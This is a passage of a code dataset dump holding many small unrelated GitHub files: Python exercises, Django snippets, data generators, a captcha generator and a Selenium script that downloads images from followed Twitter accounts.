\n \n def run(self):\n print(\"Hello from %s\" % threading.get_ident())\n \n \nif __name__ == \"__main__\":\n th_list = []\n for i in range(4):\n th = MyClass(i)\n th_list.append(th) \n th.start()\n \n\n for th in th_list:\n th.join()\n \n print(\"end of thread_ex01\")\n","repo_name":"effort-type/ParallelProgramming","sub_path":"PythonProjects/thread_programs/thread_ex1.py","file_name":"thread_ex1.py","file_ext":"py","file_size_in_byte":473,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"31112175200","text":"import os\n\n#создание класса для продуктов\nclass Products:\n \n def __init__(self, name, price):\n self.name = name # название \n self.price = price # цена\n\n\nprdcts = list() #пустой список, в котором будут храниться объекты продуктов\n\n#функция для добавления нового объекта продукта в список\ndef add_to_list(name, price):\n prdcts.append(Products(name,price))\n\n# функция отображения объектов списка с порядковыми номерами \ndef show_prdcts(productlist):\n i =0\n for obj in productlist:\n i +=1\n print(str(i) + '.', obj.name, obj.price)\n\n\n#объявление переменной файла + цикл проверки на заполненность\nfilename = ''\nwhile filename == '':\n filename = input('Введите имя файла: ')\nelse:\n \n print(\"Имя введеого файла \" + filename)\n#\"пробуем\" открыть файл\ntry:\n f= open(filename , 'r+', encoding='utf-8')\n \n for line in f: #считываем построчно файл\n line = line.replace('\\n', '') #удаляем символ новой строки путем замены на пустое значение\n line = line.split(' — ') #делим значения по разделителю ' — '\n add_to_list(line[0],line[1]) # добавляем объект в список \n \n\n\n #Выбираем действие для работы со списком\n action = ''\n #Цикл для работы со списком до тех пор пока не будет введено \"6\"\n while action != '6': \n print('\\n1. Добавить продукт в список\\n2. Изменить продукт в списке\\n3.'+ \n 'Удалить продукт из списка\\n4. Расчитать общую сумму продуктов \\n5. Посмотреть список продуктов\\n6. Выйти')\n action = input(\"Выберите нужное действие: \")\n \n if action == '1': #Если вводим 1 \"Добавить продукт в список\"\n add_to_list(input('Введите название продукта: '),input('Введите цену: '))\n \n elif action == '2': #Если вводим 2 \"Изменить продукт в списке\"\n show_prdcts(prdcts)\n choicenum = int(input(\"Выберите порядковый номер позиции для изменения: \"))\n choicenum -= 1\n prdcts[choicenum].name = input(\"Введите название: \")\n prdcts[choicenum].price = input(\"Введите цену: \")\n \n elif action == '3': #Если вводим 3 \"Удалить продукт из списка\"\n show_prdcts(prdcts)\n choicenum = int(input(\"Выберите порядковый номер позиции для удаления: \"))\n choicenum -= 1\n prdcts.pop(choicenum)\n \n elif action == '4': #Если вводим 4 \"Расчитать общую сумму продуктов\"\n sum = 0\n for obj in prdcts:\n sum += int(obj.price)\n print('Сумма = ', str(sum))\n \n elif action == '5': #Если вводим 5 \"Посмотреть список продуктов\"\n show_prdcts(prdcts)\n\n f.seek(0,0) #возращаем курсор в начало списка\n for prdc in prdcts: #для каждого элемента списка формируем строку по формату исходной и записываем в файл\n rowtofile = str(prdc.name)+ ' — ' + str(prdc.price) + \"\\n\"\n f.write(rowtofile)\n f.close() #закрываем файл\n\n\n#исключение в случае, если файл не найден, программа завершается и выводит сообщение\nexcept FileNotFoundError:\n print('Файл с таким именем не найден, повторите попытку.')\n\n#input() #пустой инпут, для отладки","repo_name":"YodaKHV/python-alif","sub_path":"taskforwork.py","file_name":"taskforwork.py","file_ext":"py","file_size_in_byte":4360,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"37797021571","text":"import random\n\n# Guardar el resultado de calculos previos para evitar recursiones muy grandes a medida que voy creciendo.\nmemo = [0, 1, 1]\n\n# Fibonacci pero con la primer posicion siendo 0\ndef fibonacci(n):\n if len(memo) <= n:\n res = fibonacci(n-1) + fibonacci(n-2)\n memo.append(res)\n return res\n else:\n return memo[n]\n\ndef estimar_entrega(distancia):\n rango = distancia // 100\n return fibonacci(rango), rango\n\n\ndistancias = sorted([random.randint(0, 2000) for x in range(20)])\n\nfor distancia in distancias:\n dias, rango = estimar_entrega(distancia)\n print(f'El tiempo de entrega para una distancia de {distancia}km con rango {rango} es {dias} dias')\n","repo_name":"mat105/enviame-backend-test","sub_path":"Ejercicio-6/estimar.py","file_name":"estimar.py","file_ext":"py","file_size_in_byte":697,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"16587490603","text":"import os\nimport pandas as pd\nimport argparse\nimport sys\n\nprint(\"On python, Arguments are: \",sys.argv)\nargs = sys.argv\ninputDir = args[1]\ntrait = args[2]\narea = args[3]\nsnp = args[4]\n#Comment\n\n#check if inputs are read correctly\nprint(\"input directory path:\",inputDir)\nprint(\"trait: \",trait)\nprint(\"area: \",area)\nprint(\"snp: \",snp)\n\ninput_list = os.listdir(inputDir)\nprint(\"Input list length: \", len(input_list))\n\nmerged_data = pd.DataFrame()\n\nindex = 0\nfor file_name in input_list:\n csv = pd.read_csv(inputDir+'/'+file_name)\n df = pd.DataFrame(csv)\n df.columns = df.columns.str.upper()\n #print(file_name)\n f1 = df.loc[(df[\"TRAIT\"]==trait)&(df['AREA']==area)&(df['SNP']==snp)]\n merged_data = pd.concat([merged_data, f1],sort=False)\n index += 1\n\n \nmerged_data.rename(columns={'STUDY':'Study'}, inplace=True)\nmerged_data.sort_values(by=['Study'])\nprint(\"Merged CSV\",merged_data.head())\n\nmerged_data.to_csv(path_or_buf=args[-1],index=False)\n","repo_name":"mosoriob/enigma_domain","sub_path":"code/library/MergeAndFilter/MergeAndFilter.py","file_name":"MergeAndFilter.py","file_ext":"py","file_size_in_byte":962,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"14398010836","text":"from pathlib import Path\n\nimport tablib\nfrom faker import Faker\n\n\nclass StreamDataGenerator:\n\n def __init__(self, seed=0, data_dir='data', start_year=2000, end_year=2022, company_count=10):\n print(f'Generating data for {company_count} companies in {start_year}-{end_year}')\n Faker.seed(seed)\n self.faker = Faker(['en_GB'])\n self.organisations = [self.faker.company() for _ in range(company_count)]\n self.years = list(range(start_year, end_year))\n self.DATA_DIR = Path(data_dir)\n\n def generate_data(self):\n \"\"\"\n Generate a list of random data.\n\n :param num_rows: number of rows to generate\n :return: list of random data\n \"\"\"\n\n for org in self.organisations:\n for year in self.years:\n print(f'Generating data for {org} in {year}')\n self.generate_files(org, year)\n\n def generate_files(self, org, year):\n _modes = ['csv', 'xslx-single', 'xslx-multi']\n _mode = self.faker.random.choice(_modes)\n datasets = self.generate_dataset(org, year)\n if _mode == 'csv':\n return self.save_csv(org, year, datasets)\n elif _mode == 'xslx-single':\n return self.save_xlsx_single(org, year, datasets)\n elif _mode == 'xslx-multi':\n return self.save_xlsx_multi(org, year, datasets)\n\n def generate_dataset(self, org, year):\n col_count = 10\n sheet_data = []\n for sheets in range(1, 11):\n headers = [\n self.get_column_name(col+1)\n for col in range(col_count)\n ]\n data = tablib.Dataset(headers=headers)\n for row in range(1, self.faker.random.randint(20, 100)):\n data.append([\n self.faker.first_name(),\n self.faker.last_name(),\n self.faker.job(),\n self.faker.address(),\n self.faker.random.randint(13, 99),\n self.faker.address(),\n self.faker.credit_card_number(),\n year,\n org,\n self.faker.bs(),\n ])\n sheet_data.append(data)\n return sheet_data\n\n def get_column_name(self, col):\n prefix = self.faker.random.choice(['col', 'c', 'column'])\n style = self.faker.random.choice(['lower', 'camel', 'upper'])\n if style == 'camel':\n prefix = prefix[0].upper() + prefix[1:]\n elif style == 'upper':\n prefix = prefix.upper()\n\n separator = self.faker.random.choice(['_', '-', '', ''])\n return f'{prefix}{separator}{col}'\n\n def save_csv(self, org, year, datasets):\n sheet_prefix = self.faker.random.choice(['table', 'sheet', 'data'])\n separator = self.faker.random.choice(['_', '-', '', ''])\n pattern = self.faker.random.choice([\n '{org}-{year}-{sheet}.csv',\n '{org}/{year}/{sheet_prefix}{separator}{sheet}.csv',\n '{year}/{org}/{sheet_prefix}{separator}{sheet}.csv',\n '{year}-{org}/{sheet_prefix}{separator}{sheet}.csv',\n '{org}-{year}/{sheet_prefix}{separator}{sheet}.csv',\n ])\n for sheet, data in enumerate(datasets):\n filename = pattern.format(\n org=org,\n year=year,\n sheet_prefix=sheet_prefix,\n separator=separator,\n sheet=sheet+1,\n )\n filename = self.DATA_DIR / filename\n filename.parent.mkdir(parents=True, exist_ok=True)\n with open(filename, 'wt') as f:\n f.write(data.export('csv'))\n\n def save_xlsx_single(self, org, year, datasets):\n sheet_prefix = self.faker.random.choice(['table', 'sheet', 'data'])\n separator = self.faker.random.choice(['_', '-', '', ''])\n pattern = self.faker.random.choice([\n '{org}-{year}-{sheet}.csv',\n '{org}/{year}/{sheet_prefix}{separator}{sheet}.xlsx',\n '{year}/{org}/{sheet_prefix}{separator}{sheet}.xlsx',\n '{year}-{org}/{sheet_prefix}{separator}{sheet}.xlsx',\n '{org}-{year}/{sheet_prefix}{separator}{sheet}.xlsx',\n ])\n for sheet, data in enumerate(datasets):\n filename = pattern.format(\n org=org,\n year=year,\n sheet_prefix=sheet_prefix,\n separator=separator,\n sheet=sheet+1,\n )\n filename = self.DATA_DIR / filename\n filename.parent.mkdir(parents=True, exist_ok=True)\n with open(filename, 'wb') as f:\n f.write(data.export('xlsx'))\n\n def save_xlsx_multi(self, org, year, datasets):\n sheet_prefix = self.faker.random.choice(['table', 'sheet', 'data'])\n separator = self.faker.random.choice(['_', '-', '', ''])\n pattern = self.faker.random.choice([\n '{org}-{year}.xlsx',\n '{org}/{year}.xlsx',\n '{year}/{org}.xlsx',\n '{year}-{org}.xlsx',\n '{org}-{year}.xlsx',\n ])\n for sheet, data in enumerate(datasets):\n data.title = f'{sheet_prefix}{separator}{sheet+1}'\n databook = tablib.Databook(datasets)\n\n filename = pattern.format(\n org=org,\n year=year,\n sheet_prefix=sheet_prefix,\n separator=separator,\n )\n filename = self.DATA_DIR / filename\n filename.parent.mkdir(parents=True, exist_ok=True)\n with open(filename, 'wb') as f:\n f.write(databook.export('xlsx'))\n\n\nif __name__ == '__main__':\n generator = StreamDataGenerator()\n generator.generate_data()\n","repo_name":"kws/sfdata-stream-tutorial","sub_path":"sfdata_stream_tutorial/_generate.py","file_name":"_generate.py","file_ext":"py","file_size_in_byte":5730,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"36589294873","text":"from django.conf.urls import patterns, include, url\nfrom django.contrib import admin\nfrom django.views.generic import RedirectView\n\nadmin.autodiscover()\n\nurlpatterns = patterns('',\n url(r'^$', RedirectView.as_view(url='/blog/')),\n url(r'^blog/', include('blog.urls')),\n url(r'^trash/', include('trash.urls')),\n url(r'^admin/', include(admin.site.urls)),\n url(r'^grappelli/', include('grappelli.urls')),\n)\n","repo_name":"michaelamie/mta-x.net","sub_path":"mtax/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":410,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"44"} +{"seq_id":"72372696132","text":"#! python3\n\nimport openpyxl, os\n\nimport setup\n\nfilename = 'writeFormula.xlsx'\n\n# create\nwb = openpyxl.Workbook()\nsheet = wb.active\nsheet['A1'] = 200\nsheet['A2'] = 300\nsheet['A3'] = '=SUM(A1:A2)'\nwb.save(filename)\n\n\nwb_formulas = openpyxl.load_workbook(filename, data_only=False)\nsheet = wb_formulas.active\nformula = sheet['A3'].value\n\nwb_data_only = openpyxl.load_workbook(filename, data_only=True)\nsheet = wb_data_only.active\nvalue = sheet['A3'].value\n\nprint('{}, {}'.format(formula, value)) # => =SUM(A1:A2), None\n\n","repo_name":"friendbear/AutomateWithPython","sub_path":"excel/formula.py","file_name":"formula.py","file_ext":"py","file_size_in_byte":517,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"43370846914","text":"import os\n\ndef pullValue(theChar):\n\tif theChar.isupper():\n\t\treturn ord(theChar)-38\n\telse:\n\t\treturn ord(theChar)-96\n\ncurFile = open(\"input.txt\",'r').readlines()\narrayList=[]\ntempTotal=0\ncurMax=0\ntotalArray=[]\nset1=set()\nset2=set()\nprioritySum=0\nfor line in curFile:\n\tarrayList.append(line[:-1])\n\t\nprint(arrayList)\n\nfor line in arrayList:\n\tset1=set(line[0:len(line)//2])\n\tset2=set(line[(len(line)//2):len(line)+1])\n\tsetIntersect=set1.intersection(set2)\n\tprint(set2)\n\tprint(set1)\n\tprint(setIntersect)\n\tprioritySum +=pullValue(list(setIntersect)[0])\nprint(prioritySum)","repo_name":"Briar-S/Advent-Of-Code","sub_path":"DAY3/DAY3_1.py","file_name":"DAY3_1.py","file_ext":"py","file_size_in_byte":564,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"28999045699","text":"N,M=list(map(int,input().split()))\nmon=list(map(int,input().split()))\narr=[[0]*(M+1)for _ in range(N)]\n\nfor i in range(1,M+1):\n if(mon[0]>i):\n arr[0][i]=0\n if(i%mon[0]==0):\n arr[0][i]=i//mon[0]\nfor i in range(1,N):\n for j in range(1,M+1):\n if(mon[i]>j):\n arr[i][j]=arr[i-1][j]\n else:\n ch1=arr[i][j-mon[i]]+1\n if(ch1==1): # 현재 화폐를 통해 못만듦\n arr[i][j]=arr[i-1][j]\n if(j==mon[i]):\n arr[i][j]=1\n elif(arr[i-1][j]!=0): # 과거에도 만들기 가능\n arr[i][j]=min(arr[i-1][j],ch1)\n elif(arr[i-1][j]==0): #과거에도 못만듦\n if(ch1!=1): #현재 화폐로는 만들기 가능\n arr[i][j]=ch1\n else: #현재도 불가능\n arr[i][j]=0\nprint(arr)\n\nif(arr[N-1][M]==0):\n print(-1)\nelse:\n print(arr[N-1][M])","repo_name":"Silky-ai/codingtest_book_2020","sub_path":"다이나믹프로그래밍/효율적인 화폐 구성.py","file_name":"효율적인 화폐 구성.py","file_ext":"py","file_size_in_byte":818,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"2495675527","text":"#!/usr/bin/python\r\n#\r\n# Copyright (c) Ansible Project\r\n# GNU General Public License v3.0+ (see COPYING or https://www.gnu.org/licenses/gpl-3.0.txt)\r\n\r\nfrom __future__ import absolute_import, division, print_function\r\n__metaclass__ = type\r\n\r\nfrom abc import abstractmethod\r\nfrom ansible.module_utils.basic import AnsibleModule\r\nfrom ansible_collections.radware.radware_modules.plugins.module_utils.common import BaseAPI, RadwareModuleError, radware_server_argument_spec, \\\r\n build_specs_from_annotation\r\ntry:\r\n from radware.sdk.api import BaseDeviceConnection\r\n from radware.sdk.exceptions import RadwareError\r\n from radware.sdk.management import DeviceManagement\r\n from radware.sdk.configurator import DeviceConfigurationManager, ConfigManagerResult, MSG_NO_CHANGE\r\nexcept ModuleNotFoundError:\r\n AnsibleModule(argument_spec={}, check_invalid_arguments=False).fail_json(\r\n msg=\"The radware-sdk-common package is required\")\r\n\r\n\r\nANSIBLE_METADATA = {'metadata_version': '1.1',\r\n 'status': ['stableinterface'],\r\n 'supported_by': 'certified'}\r\n\r\nDOCUMENTATION = r'''\r\nmodule: Device Configurator module\r\nauthor:\r\n - Leon Meguira (@leonmeguira)\r\n'''\r\n\r\nDEFAULT_STATE = ['present', 'absent']\r\nEXCLUDE_STATE = ['read_all']\r\nSDK_TO_ANSIBLE_CMD = {\r\n 'deploy': 'overwrite',\r\n 'delete': 'absent',\r\n 'update': 'append'\r\n}\r\nANSIBLE_TO_SDK_CMD = {\r\n 'overwrite': 'deploy',\r\n 'absent': 'delete',\r\n 'present': 'update',\r\n 'append': 'update'\r\n}\r\n\r\n\r\ndef configuration_choice_translation(sdk_choices):\r\n choices = list()\r\n choices.extend(DEFAULT_STATE)\r\n for item in sdk_choices:\r\n if item in EXCLUDE_STATE:\r\n continue\r\n if item in SDK_TO_ANSIBLE_CMD:\r\n if SDK_TO_ANSIBLE_CMD[item] not in DEFAULT_STATE:\r\n choices.append(SDK_TO_ANSIBLE_CMD[item])\r\n else:\r\n choices.append(item)\r\n return choices\r\n\r\n\r\nclass ConfigurationArgumentSpec(object):\r\n def __init__(self, config_class):\r\n self.supports_check_mode = True\r\n argument_spec = dict(\r\n parameters=dict(\r\n required=False,\r\n type='dict',\r\n options=build_specs_from_annotation(config_class.get_parameters_class())\r\n ),\r\n state=dict(\r\n required=True,\r\n choices=configuration_choice_translation(config_class.api_function_names())\r\n ),\r\n write_on_change=dict(\r\n required=False,\r\n type='bool',\r\n default=False\r\n )\r\n )\r\n self.argument_spec = {}\r\n self.argument_spec.update(radware_server_argument_spec)\r\n self.argument_spec.update(argument_spec)\r\n\r\n\r\nclass ConfigurationModule(BaseAPI):\r\n \"\"\"\r\n generate input param object from dict\r\n create 'DeviceConfigurationManager' instance\r\n execute configurator and return dict result to caller\r\n \"\"\"\r\n def __init__(self, configurator_class, **kwargs):\r\n self._configurator = configurator_class(self._device_connection)\r\n self._config_manager = DeviceConfigurationManager()\r\n self._state = self._base.params['state']\r\n self._write_on_change = self._base.params['write_on_change']\r\n if self._state == 'present':\r\n self._differential_update = True\r\n else:\r\n self._differential_update = False\r\n\r\n self.arguments = configurator_class.get_parameters_class()()\r\n if self._base.params['parameters'] is None:\r\n self._base.params['parameters'] = dict()\r\n self.arguments.set_attributes(**self._base.params['parameters'])\r\n self.result = {}\r\n self.changed = False\r\n self.changes = None\r\n if hasattr(self._base.module, '_diff'):\r\n self._report_diff = getattr(self._base.module, '_diff')\r\n else:\r\n self._report_diff = False\r\n\r\n @abstractmethod\r\n def _on_error(self):\r\n pass\r\n\r\n @property\r\n def command(self):\r\n if self._state in ANSIBLE_TO_SDK_CMD:\r\n return ANSIBLE_TO_SDK_CMD[self._state]\r\n else:\r\n return self._state\r\n\r\n def exec_module(self):\r\n def prepare_object():\r\n device_current = self._config_manager.execute(self._configurator, 'read', self.arguments).content_translate\r\n if device_current is None:\r\n return self._base.params['parameters']\r\n if self._base.module.check_mode:\r\n if '---' in self.changes:\r\n for key in self.changes['---'].keys():\r\n if key in device_current:\r\n if type(self.changes['---'][key]) == list:\r\n for item in self.changes['---'][key]:\r\n device_current[key].remove(item)\r\n else:\r\n del device_current[key]\r\n if '+++' in self.changes:\r\n for key in self.changes['+++'].keys():\r\n if type(self.changes['+++'][key]) == list:\r\n if type(device_current[key]) != list:\r\n device_current[key] = []\r\n for item in self.changes['+++'][key]:\r\n device_current[key].append(item)\r\n else:\r\n device_current[key] = self.changes['+++'][key]\r\n return device_current\r\n\r\n # try:\r\n # self._device_mng.verify_device_accessible(retries=2)\r\n # except RadwareError as e:\r\n # raise RadwareModuleError(e)\r\n\r\n try:\r\n conf_mng_result = self._config_manager.execute(self._configurator, self.command, self.arguments,\r\n dry_run=self._base.module.check_mode,\r\n differential=self._differential_update,\r\n write_on_change=self._write_on_change,\r\n get_diff=True)\r\n if conf_mng_result.diff:\r\n self.changed = True\r\n self.changes = conf_mng_result.diff\r\n except RadwareError as e:\r\n self._on_error()\r\n raise RadwareModuleError(e)\r\n\r\n if self.changed:\r\n self.result.update(dict(changed=self.changed))\r\n if self._report_diff:\r\n self.result.update(dict(diff=self.changes))\r\n self.result.update(status=conf_mng_result.content_translate, obj=prepare_object())\r\n else:\r\n if self._state in ANSIBLE_TO_SDK_CMD:\r\n self.result.update(status=MSG_NO_CHANGE, obj=None)\r\n else:\r\n if self._state == 'read':\r\n read_result = conf_mng_result.content_translate\r\n if read_result:\r\n self.result.update(status='found', obj=read_result)\r\n else:\r\n self.result.update(status='not found', obj=read_result)\r\n else:\r\n self.result.update(status=conf_mng_result.content_translate, obj=None)\r\n return self.result\r\n\r\n\r\n","repo_name":"Radware/radware-ansible","sub_path":"plugins/module_utils/configuration.py","file_name":"configuration.py","file_ext":"py","file_size_in_byte":7362,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"44"} +{"seq_id":"31459626356","text":"import matplotlib.pyplot as plt\nimport numpy as np\nfrom scipy.spatial.distance import euclidean\n\nclass RobotArm:\n def __init__(self, links=[50, 40, 40], target_pos=[0, 0]):\n # Robot link length parameter\n self.links = links\n self.target_pos = target_pos\n\n def rotateZ(self, theta):\n rz = np.array([[np.cos(theta), - np.sin(theta), 0, 0],\n [np.sin(theta), np.cos(theta), 0, 0],\n [0, 0, 1, 0],\n [0, 0, 0, 1]])\n return rz\n\n def translate(self, dx, dy, dz):\n t = np.array([[1, 0, 0, dx],\n [0, 1, 0, dy],\n [0, 0, 1, dz],\n [0, 0, 0, 1]])\n return t\n\n # Forward Kinematics\n def FK(self, joints_angle):\n n_links = len(self.links)\n P = []\n P.append(np.eye(4))\n for i in range(0, n_links):\n R = self.rotateZ(joints_angle[i])\n T = self.translate(self.links[i], 0, 0)\n P.append(P[-1].dot(R).dot(T))\n return P\n\n # Here is objective function\n # GA will minimize this function\n def calc_distance_error(self, joints_angle):\n P = self.FK(joints_angle)\n current_pos = [float(P[-1][0, 3]), float(P[-1][1, 3])]\n error = euclidean(current_pos, self.target_pos)\n return error\n\n # Plot joint configuration result\n def plot(self, joints_angle):\n fig = plt.figure()\n ax = fig.add_subplot(1, 1, 1)\n P = self.FK(joints_angle)\n for i in range(len(self.links)):\n start_point = P[i]\n end_point = P[i + 1]\n ax.plot([start_point[0, 3], end_point[0, 3]], [start_point[1, 3], end_point[1, 3]], linewidth=5)\n plt.grid()\n plt.show()\n","repo_name":"artbug-nova/genetic","sub_path":"sources/robot.py","file_name":"robot.py","file_ext":"py","file_size_in_byte":1775,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"26331967279","text":"from django import forms\n\nfrom .models import Kitten\n\nclass KittenForm(forms.ModelForm):\n BATHROOM_TYPES = (\n ('urine','urine'),\n ('bm','bowel movement'),\n ('none','none'),\n )\n name = forms.CharField(widget=forms.TextInput(attrs={'readonly':'True'}))\n pre_feed = forms.IntegerField()\n post_feed = forms.IntegerField()\n bathroom = forms.CharField()\n #bathroom = forms.CharField(widget=forms.Select(choices=BATHROOM_TYPES))\n\n class Meta:\n model = Kitten\n fields = ('name','pre_feed','post_feed','bathroom')","repo_name":"Decap1tator/kittennursery","sub_path":"feeding/forms.py","file_name":"forms.py","file_ext":"py","file_size_in_byte":563,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"6329899309","text":"import unittest\nimport sys\nimport os\n# COMPATIBILITY: since python 3.3 mock is included in unittest module\npython_version = sys.version_info\nif python_version[:2] <= (3, 3):\n import mock\n from mock import patch\nelse:\n import unittest.mock as mock\n from unittest.mock import patch\n\n# pyConnectomist import\nimport pyconnectomist\nfrom pyconnectomist.utils.pdftools import generate_pdf\n\n\nclass PDFReportCreator(unittest.TestCase):\n \"\"\" Test the PDF report creator:\n 'pyconnectomist.utils.pdftools.generate_pdf'\n \"\"\"\n def setUp(self):\n \"\"\" Define fucntion parameters.\n \"\"\"\n self.kwargs = {\n \"datapath\": \"/my/path/mock_datadir\",\n \"struct_file\": os.path.join(\n os.path.abspath(os.path.dirname(pyconnectomist.__file__)),\n \"utils\", \"resources\", \"pyconnectomist_qcfast.json\"),\n \"author\": \"Author\",\n \"client\": \"Client\",\n \"poweredby\": \"PoweredBy\",\n \"project\": \"Project\",\n \"timepoint\": \"Timepoint\",\n \"subject\": \"Subejct\",\n \"date\": \"Date\",\n \"title\": \"Title\",\n \"filename\": \"/my/path/mock_pdffile\",\n \"pagesize\": None,\n \"left_margin\": 10,\n \"right_margin\": 10,\n \"top_margin\": 20,\n \"bottom_margin\": 20,\n \"show_boundary\": False,\n \"verbose\": 1\n }\n\n @mock.patch(\"pyconnectomist.utils.pdftools.PDFcreator.update\")\n def test_normal_execution(self, mock_update):\n \"\"\" Test the normal behaviour of the function.\n \"\"\"\n # Test execution\n generate_pdf(**self.kwargs)\n self.assertEqual(len(mock_update.call_args_list), 1)\n\n\nif __name__ == \"__main__\":\n unittest.main()\n","repo_name":"neurospin/pyconnectomist","sub_path":"pyconnectomist/tests/tests_utils/test_pdftools.py","file_name":"test_pdftools.py","file_ext":"py","file_size_in_byte":1762,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"44"} +{"seq_id":"74638083014","text":"from captcha.image import ImageCaptcha\nimport random as rd\n\ndef random_captcha():\n charc=\"abcdefghijktuvwxyzAIJKLlmnopqrsMNOPQRSTUVBCDEFGHWXYZ1234567890\"\n LEN=6\n data=''\n for i in range(6):\n i=rd.randint(0,len(charc)-1)\n data=data+charc[i]\n imc=ImageCaptcha(width=200,height=100)\n imc.write(data,'out.png')\n print(\"Random Image Captcha generated\")\nrandom_captcha()\n","repo_name":"ksdkamesh99/NewFangled-Scripts","sub_path":"captcha generator/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":400,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"44"} +{"seq_id":"28983187380","text":"from selenium import webdriver\nfrom selenium.webdriver.common.keys import Keys\nfrom selenium.webdriver.common.by import By\nfrom selenium.webdriver.support.wait import WebDriverWait\nfrom time import sleep\nimport json\nimport keys\nimport random\nfrom urllib import request\nimport os\n\nverbose = False\nperfils_file = 'perfiles.json'\nimages_path = 'images/'\nPATH = \"chromedirver.exe\"\nmax_images = 10 # cantidad de imagenes que se descargan\n\n\ndriver = webdriver.Chrome(PATH)\ndriver.implicitly_wait(10)\n\n# descarga una imagen de internet\n# Descarga una imagen de una cuenta de usuario y la guarda en su propia carpeta\n\n\ndef download_image(web_url, folder=images_path, img_name=None):\n log(f'Downloading {web_url} to {folder}')\n # create folder if do not exist\n os.makedirs(folder, exist_ok=True)\n\n # genera un nombre aleatorio para la imgaen, cunado no hay parametro img_name\n if img_name == None:\n name = random.randrange(1, 100)\n img_name = name\n \n # control de colision de nombres de archivos ---------------------\n while image_exist(folder, img_name):\n if type(img_name) == int:\n new_image_name = img_name + 1\n else:\n new_image_name = f'{img_name}b'\n img_name = new_image_name\n \n # genera la ruta completa de la imagen\n fullname = f'{folder}/{img_name}.png'\n\n # descarga la imagen de internet\n request.urlretrieve(web_url, fullname)\n\n print('+ '+fullname)\n\n# guarda el registro de las descargas en un archivo\n\n\ndef save_accounts_dict(accounts: dict, perfils_file=perfils_file):\n log(f'Saveing the dictionary to {perfils_file} file')\n\n if len(accounts) == 0:\n return\n\n with open(perfils_file, \"w\") as fp:\n json.dump(accounts, fp, indent=4)\n\n# carga el dicionario de registro de descargas del archivo\n\n\ndef load_accounts_dict(perfils_file=perfils_file):\n log(f'Loading accounts from {perfils_file} file')\n if not perfils_file in os.listdir():\n print(\n f\"Error al cargar el registro de descargas, no extiste el archivo {perfils_file}\")\n return {}\n\n with open(perfils_file, \"r\") as fp:\n accounts_dict = json.load(fp)\n\n return dict(accounts_dict)\n\n# go to account and scrape their images\n\n\ndef get_images_from(account, max_images=max_images):\n log(f'Getting {max_images} images from {account}')\n\n driver.get('https://twitter.com/' + account)\n\n # Open carrusel\n try:\n carrusel = driver.find_element(\n By.XPATH, '//div[@class=\"css-1dbjc4n r-1iusvr4 r-16y2uox r-a5pmau r-bnwqim\"][1]')\n carrusel.click()\n except:\n print('Error. Carrusel not finded')\n return\n\n # clic on next\n try:\n for i in range(max_images):\n next = driver.find_element(\n By.XPATH, '//div[@aria-label=\"Next slide\"]')\n sleep(0.4)\n next.click()\n except:\n print('Error clicking Next on carrusel')\n\n # get the images\n imgs = driver.find_elements(By.XPATH, '//li//img[@alt=\"Image\"]')\n imgs = [i.get_attribute('src') for i in imgs]\n\n # returns a list of image urls\n return imgs\n\n# Listar todos los nombres de perfiiles\n\n\ndef list_following(account):\n log('Listing following accounts')\n\n path = 'https://twitter.com/'+account+'/following'\n driver.get(path)\n sleep(5)\n following_list = []\n following_list = driver.find_elements(\n By.XPATH, '//div[@data-testid=\"cellInnerDiv\"]//div[@class=\"css-1dbjc4n r-1awozwy r-18u37iz r-1wbh5a2\"]')\n following_list = [i.text for i in following_list]\n\n print(following_list)\n print(len(following_list))\n\n return following_list\n\n\ndef login_twitter():\n log('Logging to twitter')\n\n # Login to twitter\n driver.get(\"https://www.twitter.com/login\")\n\n # login\n # set user\n username = driver.find_element(By.XPATH, '//input[@name=\"text\"]')\n username.send_keys(keys.USER)\n\n # Click on \"Next\"\n btn_next = driver.find_element(By.XPATH, '//div[@role=\"button\"][2]')\n btn_next.click()\n\n # set password\n password = driver.find_element(By.NAME, 'password')\n password.send_keys(keys.PASS)\n\n # click on login\n submit = driver.find_element(\n By.XPATH, '//div[@data-testid=\"LoginForm_Login_Button\"]')\n submit.click()\n\n sleep(2)\n\n\ndef print_dict(dictionary):\n print(json.dumps(dictionary, sort_keys=True, indent=4))\n\n\ndef url_to_dict(dictionary, img_weburl, account):\n log(f'Url {img_weburl} to dictionary in {account}')\n\n accout_names = list(dictionary.keys())\n if account in accout_names:\n # print('existe la cuentaa: ' + account)\n if img_weburl in dictionary[account]:\n # print(f'existe la url: {img_weburl}')\n pass\n else:\n # print(f'+ adding url {img_weburl}')\n dictionary[account].append(img_weburl)\n else:\n print(f'+ adding [{account}] to the dictionary')\n dictionary[account] = [img_weburl]\n\n return dictionary\n\n# Busca las cuentas de perfils_list, les roba las imagenes y guarda info en un archivo\n\n\ndef image_exist(folder:str, nombre:str):\n archivo = f'{nombre}.png'\n return archivo in os.listdir(folder)\n\ndef attack(account: str):\n log(f'Attacking {account}...')\n\n # obtiene una lista de urls de las imagenes\n image_url_list = get_images_from(account)\n\n # cancela el ataque si no hay imagenes\n if image_url_list == None:\n log('- No se encontraron imagenes')\n return\n\n ## descarga cada imagen de la lista --------------------------\n \n idx = 0 # contador para el nombre de las imagenes\n perfils_dict = load_accounts_dict() # carga el diccionario\n \n for web_url in 